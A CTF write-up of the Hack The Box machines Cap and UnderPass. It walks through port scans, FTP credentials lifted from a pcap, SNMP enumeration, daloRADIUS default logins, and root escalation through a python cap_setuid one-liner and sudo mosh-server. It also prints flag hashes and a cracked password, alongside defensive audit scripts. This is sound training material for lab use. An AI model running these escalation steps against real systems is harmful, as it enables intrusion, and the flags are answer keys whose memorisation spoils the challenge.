HTB-Cap & UnderPass

This post was last updated on the evening of March 12, 2025.

Cap

Task 1

┌──(root㉿butt3rf1y)-[/HTB/Machine/Cap]
└─# nmap -p- -T4 --min-rate=1000 -sS -Pn 10.10.10.245
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-11 14:39 CST
Nmap scan report for 10.10.10.245
Host is up (0.30s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 86.05 seconds

Ports 21, 22 and 80 are open.

How many TCP ports are open?
:3

Task 2

Visit port 80, find Security Snapshot in the sidebar, and look at the URL.

After running a "Security Snapshot", the browser is redirected to a path of the format /[something]/[id], where [id] represents the id number of the scan. What is the [something]?
:data

Task 3

Network Status in the sidebar shows that there are other IPs as well.

Are you able to get to other users' scans?
:yes

Task 4

What is the ID of the PCAP file that contains sensitive data?
:0

Task 5

Download the packet capture from http://10.10.10.245/data/0.

Which application layer protocol in the pcap file can the sensitive data be found in?
:ftp

Task 6

USER nathan
PASS Buck3tH4TF0RM3!

The same password works for SSH.

We've managed to collect nathan's FTP password. On what other service does this password work?
:ssh
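Added example, not from the original post: a dependency-free pcap reader that flags FTP logins sent in the clear, which is how nathan's credential ended up in scan 0. The capture is constructed inline (Ethernet/IPv4/TCP headers built by hand) so the block runs offline; the IP addresses and client port are assumptions.

```python
import struct

# Constructed sample: a minimal pcap (link type 1 = Ethernet) carrying an
# FTP control-channel exchange like the one recovered from the Cap capture.
# Frames are built by hand so the block runs offline; addresses are assumed.
FTP_SRC, FTP_DST = bytes([10, 10, 14, 2]), bytes([10, 10, 10, 245])

def build_pcap(payloads, dport=21):
    """Wrap each payload in Ethernet/IPv4/TCP headers and a pcap record."""
    # pcap global header: magic, version 2.4, thiszone, sigfigs, snaplen, linktype
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for seq, p in enumerate(payloads):
        tcp = struct.pack("!HHIIBBHHH", 40000, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0)
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(p),
                         0, 0, 64, 6, 0, FTP_SRC, FTP_DST)
        frame = b"\x00" * 12 + b"\x08\x00" + ip + tcp + p   # zero MACs, ethertype IPv4
        out += struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame
    return out

def ftp_logins(pcap):
    """Return (user, password) pairs sent in clear text to FTP port 21."""
    magic, = struct.unpack("<I", pcap[:4])
    end = "<" if magic == 0xA1B2C3D4 else ">"       # byte order of the file
    off, users, found = 24, {}, []
    while off + 16 <= len(pcap):
        caplen = struct.unpack(end + "IIII", pcap[off:off + 16])[2]
        f = pcap[off + 16:off + 16 + caplen]
        off += 16 + caplen
        if f[12:14] != b"\x08\x00" or f[23] != 6:    # IPv4 carrying TCP only
            continue
        ihl = (f[14] & 0x0F) * 4
        tcp = f[14 + ihl:]
        sport, dport = struct.unpack("!HH", tcp[:4])
        if dport != 21:
            continue
        data = tcp[(tcp[12] >> 4) * 4:].decode("ascii", "replace").strip()
        key = (f[26:30], sport)                       # one FTP session = src ip + port
        if data.upper().startswith("USER "):
            users[key] = data[5:]
        elif data.upper().startswith("PASS ") and key in users:
            found.append((users[key], data[5:]))
    return found

SAMPLE = build_pcap([b"USER nathan\r\n", b"PASS Buck3tH4TF0RM3!\r\n", b"LIST\r\n"])

def report(pcap=SAMPLE):
    """Human-readable findings with the password itself redacted."""
    return [f"cleartext FTP login for '{u}' (password {len(p)} chars, redacted)"
            for u, p in ftp_logins(pcap)]
```

The same logic applied to a real capture would run over the exported scan file; the finding is that any service accepting cleartext FTP logins needs to move to FTPS or SFTP.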

Submit User Flag

ftp 10.10.10.245
get user.txt

Submit the flag located in the nathan user's home directory.
:12298311c41311a3b59b48879e6c07ff

Task 8

Upload linpeas.sh and run it; under Capabilities it reports /usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

The same thing can be found directly:

getcap -r / 2>/dev/null
What is the full path to the binary on this machine that has special capabilities that can be abused to obtain root privileges?
:/usr/bin/python3.8

Submit Root Flag

Run:

python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'

This drops into a root shell.

Submit the flag located in root's home directory.
:078602034d5abb9587c86b9f7560ab18

Capabilities

https://gtfobins.github.io/gtfobins/python/

If the binary has the Linux CAP_SETUID capability set, or is executed by another binary with that capability, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.

cp $(which python) .
sudo setcap cap_setuid+ep python

./python -c 'import os; os.setuid(0); os.system("/bin/sh")'

The Capabilities mechanism was introduced after Linux kernel 2.2. It splits the root user's privileges into separate areas that can be enabled or disabled individually. If the euid is not root, the kernel checks whether the process holds the capability corresponding to the privileged operation and uses that to decide whether the operation may proceed; it is mainly a finer-grained alternative to SUID-based privilege control.

The CAP_SETUID seen above is the capability that governs changing a process's uid (setuid(), setreuid(), setresuid() and so on):

import os; os.setuid(0); os.system("/bin/sh")
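An added audit helper, not part of the original post or of linpeas: it parses getcap -r output in both of libcap's formats, flags the capabilities that are equivalent to SUID root (the DANGEROUS list is this example's own selection), and prints the setcap -r command that strips them. The first sample line is the one found on Cap; the rest are constructed.

```python
import re
import subprocess

# Capabilities that let a process change identity or bypass DAC; any one of
# them on an executable that untrusted users can run is as dangerous as a
# SUID-root binary. The selection is this example's own, not an official list.
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
             "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner"}

# Constructed sample output; the first line is the one linpeas showed on Cap.
SAMPLE = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/traceroute6.iputils cap_net_raw+ep
"""

# getcap prints either "path = caps+flags" (libcap < 2.41) or "path caps=flags".
LINE = re.compile(r"^(?P<path>\S+)\s*=?\s*(?P<caps>[a-z_,]+)[+=](?P<flags>[eip]+)$")

def parse_getcap(text):
    """Yield (path, set of capabilities, flag letters) for each well-formed line."""
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            yield m["path"], set(m["caps"].split(",")), m["flags"]

def audit(text):
    """Return [(path, sorted dangerous caps, effective)] for binaries worth reviewing.
    'effective' is True when the caps are in the effective set ('e'), i.e. the
    binary gets them at exec without having to call capset() itself."""
    hits = []
    for path, caps, flags in parse_getcap(text):
        bad = sorted(caps & DANGEROUS)
        if bad:
            hits.append((path, bad, "e" in flags))
    return hits

def audit_host():
    """Run getcap -r / on this host and audit the result (needs libcap tools)."""
    out = subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True).stdout
    return audit(out)

if __name__ == "__main__":
    for path, bad, eff in audit(SAMPLE):
        print(f"{path}: {','.join(bad)} effective={eff}  -> fix: setcap -r {path}")
```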

For more detail, see these blogs: https://www.cnblogs.com/f-carey/p/16026088.html and https://rk700.github.io/2016/10/26/linux-capabilities/

UnderPass

Submit User Flag

nmap

└─# nmap -sS -sV -Pn -A 10.10.11.48
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-12 17:14 CST
Nmap scan report for 10.10.11.48
Host is up (0.33s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_ 256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=3/12%OT=22%CT=1%CU=41673%PV=Y%DS=3%DC=T%G=Y%TM=67D1
OS:50C6%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)O
OS:PS(O1=M53AST11NW7%O2=M53AST11NW7%O3=M53ANNT11NW7%O4=M53AST11NW7%O5=M53AS
OS:T11NW7%O6=M53AST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)E
OS:CN(R=Y%DF=Y%T=40%W=FAF0%O=M53ANNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F
OS:=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z
OS:%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=
OS:N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=EAE7%RUD=G)IE(R=Y%DFI=N%T=
OS:40%CD=S)

Network Distance: 3 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 0.27 ms 172.30.144.1
2 369.92 ms 10.10.16.1
3 370.15 ms 10.10.11.48

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.86 seconds

HTTP and SSH are open.

80

Visiting the HTTP service turns up nothing.

UDP

└─# nmap -sV -Pn -A -sU 10.10.11.48
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-12 18:46 CST
Nmap scan report for 10.10.11.48
Host is up (0.32s latency).
Not shown: 997 closed udp ports (port-unreach)
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: c7ad5c4856d1cf6600000000
| snmpEngineBoots: 31
|_ snmpEngineTime: 17h05m41s
| snmp-sysdescr: Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
|_ System uptime: 17h05m41.35s (6154135 timeticks)
1812/udp open|filtered radius
1813/udp open|filtered radacct
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Citrix Access Gateway VPN gateway (95%), Linksys WRT610Nv3 WAP (95%), 3Com OfficeConnect 3CRWER100-75 wireless broadband router (94%), Adtran 424RG FTTH gateway (94%), Aerohive HiveOS 3.4 (94%), Aerohive HiveOS 5.1 (94%), Aerohive HiveOS 7.1 (94%), AirMagnet SmartEdge wireless sensor; or Foscam FI8904W, FI8910W, or FI8918W, or Instar IN-3010 surveillance camera (Linux 2.4) (94%), Alcatel-Lucent OmniPCX GD3 PBX (Linux 2.6.23) (94%), Allnet 2210 webcam, Cisco MDS 9124 or 9216i switch (SAN-OS 3.1 - 3.2), or Nortel IP Phone 1535 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops
Service Info: Host: UnDerPass.htb is the only daloradius server in the basin!

TRACEROUTE (using port 38063/udp)
HOP RTT ADDRESS
1 0.22 ms 172.30.144.1
2 373.85 ms 10.10.16.1
3 319.73 ms 10.10.11.48

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1225.45 seconds

Port 161 runs an SNMP service.

SNMP (Simple Network Management Protocol) is an application-layer protocol that provides a common way to manage network nodes. More details: https://www.cnblogs.com/chegxy/p/14020233.html

Use snmpwalk to dump the host's details:

snmpwalk -v 2c -c public 10.10.11.48

Two entries stand out:

iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"

One is a domain ending in .htb; the other points to a daloRADIUS server. daloRADIUS is a RADIUS web management application used to manage hotspots and general-purpose ISP deployments.
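As an added example (not from the original post), a small parser for net-snmp walk output that names the MIB-II system-group objects behind the OIDs above and pulls out what an unauthenticated read of the default community string actually discloses. The sample lines are constructed from the values shown on this page.

```python
import re

# Standard MIB-II system group (1.3.6.1.2.1.1). These objects are readable by
# anyone who knows the community string, so with the default "public" they are
# an unauthenticated information leak.
SYSTEM_GROUP = {1: "sysDescr", 2: "sysObjectID", 3: "sysUpTime", 4: "sysContact",
                5: "sysName", 6: "sysLocation", 7: "sysServices"}

# Constructed sample in net-snmp's default output format; the quoted strings
# and the uptime are the values the walk returned on UnderPass.
SAMPLE = """\
iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"
iso.3.6.1.2.1.1.3.0 = Timeticks: (6154135) 17:05:41.35
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
"""

# Accept both the "iso." prefix and the numeric ".1." form snmpwalk can print.
LINE = re.compile(r'^(?:iso|\.?1)\.3\.6\.1\.2\.1\.1\.(?P<obj>\d+)\.0 = (?P<type>\w+): (?P<val>.*)$')

def parse_system_group(text):
    """Map sysXxx names to their values for every system-group line in a walk."""
    out = {}
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if not m or int(m["obj"]) not in SYSTEM_GROUP:
            continue
        val = m["val"].strip('"') if m["type"] == "STRING" else m["val"]
        out[SYSTEM_GROUP[int(m["obj"])]] = val
    return out

def leaks(text):
    """Pull out what a reviewer would put in the finding: e-mail addresses,
    internal hostnames and the exact kernel build string."""
    sysinfo = parse_system_group(text)
    blob = " ".join(sysinfo.values())
    desc = sysinfo.get("sysDescr", "").split()
    return {
        "emails": sorted(set(re.findall(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+", blob))),
        "hostnames": sorted({h.lower() for h in re.findall(r"\b[\w-]+\.htb\b", blob, re.I)}),
        "kernel": desc[2] if len(desc) > 2 else None,
    }
```

On the net-snmp side the fix lives in snmpd.conf: replace the default `rocommunity public` with a non-default community restricted to a management source address, or move to SNMPv3 with authentication.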

A search turned up daloRADIUS, which has a login.php page; visit:

http://10.10.11.48/daloradius/app/users/login.php

That gives a login form, and the default username and password are listed at https://github.com/lirantal/daloradius/wiki/Installing-daloRADIUS:

Username: administrator
Password: radius

The defaults don't get in, but there is another login.php under a different path:

http://10.10.11.48//daloradius/app/operators/login.php

This reveals a user and a password.

The password cracks to:

underwaterfriends

Trying it over SSH works.

Submit root flag

sudo -l shows that mosh-server can be run with sudo:

svcMosh@underpass:~$ sudo -l
Matching Defaults entries for svcMosh on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
(ALL) NOPASSWD: /usr/bin/mosh-server

Mosh stands for Mobile Shell. It is a command-line tool for connecting to a remote server from a client across the internet; its distinguishing feature is that it transports over UDP, which makes it fast.

Escalate privileges through Mosh:

mosh --server="sudo /usr/bin/mosh-server" localhost

This yields the flag.
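Added example, not from the original post: a parser for sudo -l output that flags NOPASSWD rules running a shell-spawning binary as root, the pattern the svcMosh rule above matches. The first sample rule is the one captured on UnderPass; the second is constructed to show a benign entry, and SHELL_SPAWNERS is this example's own short list.

```python
import re

# Constructed sample: the sudo -l output captured on UnderPass, plus one
# extra password-protected rule so the parser shows both cases.
SAMPLE = """\
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server
    (root) /usr/bin/systemctl restart apache2
"""

# Binaries that, once started as root, leave the caller attached to a root
# shell. mosh-server is listed because a mosh client attaches to whatever
# server command it is told to run; the list is this example's own.
SHELL_SPAWNERS = {"/usr/bin/mosh-server", "/bin/bash", "/bin/sh"}

# "(runas) TAG: TAG: command" as printed in the "may run" section.
RULE = re.compile(r"^\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+)$")

def parse_sudo_rules(text):
    """Return [(runas, set of tags, command)] from the 'may run' section of sudo -l."""
    rules, in_rules = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run" in line:
            in_rules = True            # everything after this header is a rule
            continue
        if in_rules and (m := RULE.match(line)):
            tags = {t.strip(": ") for t in m["tags"].split(":") if t.strip()}
            rules.append((m["runas"], tags, m["cmd"].strip()))
    return rules

def risky_rules(text):
    """Flag rules that run a shell-spawning binary as root; True = no password needed."""
    out = []
    for runas, tags, cmd in parse_sudo_rules(text):
        binary = cmd.split()[0]
        as_root = runas.split(":")[0] in ("ALL", "root")   # "(user:group)" form
        if as_root and binary in SHELL_SPAWNERS:
            out.append((binary, "NOPASSWD" in tags))
    return out
```

The remediation is to drop the rule rather than narrow its arguments: mosh-server started as root always hands the connecting client a root shell, so there is no argument restriction that makes it safe.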


http://example.com/2025/03/12/HTB-Cap-UnderPass/
Author: butt3rf1y
Published: March 12, 2025